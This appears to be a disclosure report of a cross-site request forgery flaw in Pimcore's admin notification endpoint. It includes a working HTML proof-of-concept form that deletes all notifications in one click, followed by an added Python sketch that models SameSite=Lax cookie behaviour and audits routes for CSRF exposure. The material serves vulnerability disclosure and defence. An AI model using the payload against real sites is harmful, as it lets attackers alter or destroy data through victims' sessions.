Cross-Site Request Forgery (CSRF) in pimcore/pimcore
Jul 30th 2021
Your application does not have any CSRF protection, and you also set the SameSite attribute to Lax. This means that if some data can be altered with GET HTTP requests, your site is without doubt vulnerable to CSRF attacks.
First you run this HTML payload, and then you should see that all the notifications have been deleted.
🕵️♂️ Proof of Concept
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://x.pimcore.fun/admin/notification/delete-all">
      <input type="hidden" name="_dc" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
I tested this payload on both the stable and dev editions. (on
This vulnerability is capable of deleting any notification with only one click.
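
Why `SameSite=Lax` does not stop the form above, as an added example that is not part of the original report or of Pimcore's code: it models when a browser attaches a session cookie to a cross-site request and audits a route table for state-changing routes left exposed. Only the `/admin/notification/delete-all` path comes from the report (modelled as GET because the form has no `method` attribute); the other routes, the `Route` fields and the function names are hypothetical.

```python
from dataclasses import dataclass

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}  # "safe" methods per RFC 9110

def cookie_sent_cross_site(samesite: str, method: str, top_level_nav: bool) -> bool:
    """Would a browser attach the session cookie to a cross-site request?"""
    policy = samesite.lower()
    if policy == "none":      # sent everywhere (browsers also require Secure)
        return True
    if policy == "strict":    # never sent on cross-site requests
        return False
    if policy == "lax":
        # Lax lets the cookie through only on top-level navigations with a safe method.
        return top_level_nav and method.upper() in SAFE_METHODS
    raise ValueError(f"unknown SameSite value: {samesite!r}")

@dataclass(frozen=True)
class Route:
    path: str
    methods: frozenset
    changes_state: bool
    csrf_token_checked: bool

def csrf_exposed(route: Route, samesite: str) -> list:
    """Methods by which another site's form can hit this route with the
    session cookie attached and no CSRF token check in the way."""
    if not route.changes_state or route.csrf_token_checked:
        return []
    # A plain <form> submit is a top-level navigation and can only use GET or POST.
    return sorted(m for m in route.methods
                  if m in {"GET", "POST"} and cookie_sent_cross_site(samesite, m, True))

# Constructed route table; only the first path is taken from the report.
ROUTES = [
    Route("/admin/notification/delete-all", frozenset({"GET"}), True, False),
    Route("/admin/example/delete", frozenset({"POST"}), True, False),        # hypothetical
    Route("/admin/example/list", frozenset({"GET"}), False, False),          # hypothetical
    Route("/admin/example/update", frozenset({"GET", "POST"}), True, True),  # hypothetical
]

def audit(samesite: str) -> dict:
    """Map each exposed route path to the methods that expose it."""
    findings = {r.path: csrf_exposed(r, samesite) for r in ROUTES}
    return {path: methods for path, methods in findings.items() if methods}

if __name__ == "__main__":
    for policy in ("Lax", "Strict", "None"):
        print(policy, audit(policy))
```

Under `Lax` the audit flags only the GET route, which is why moving state changes to POST and checking a CSRF token closes this gap without relying on the cookie attribute alone.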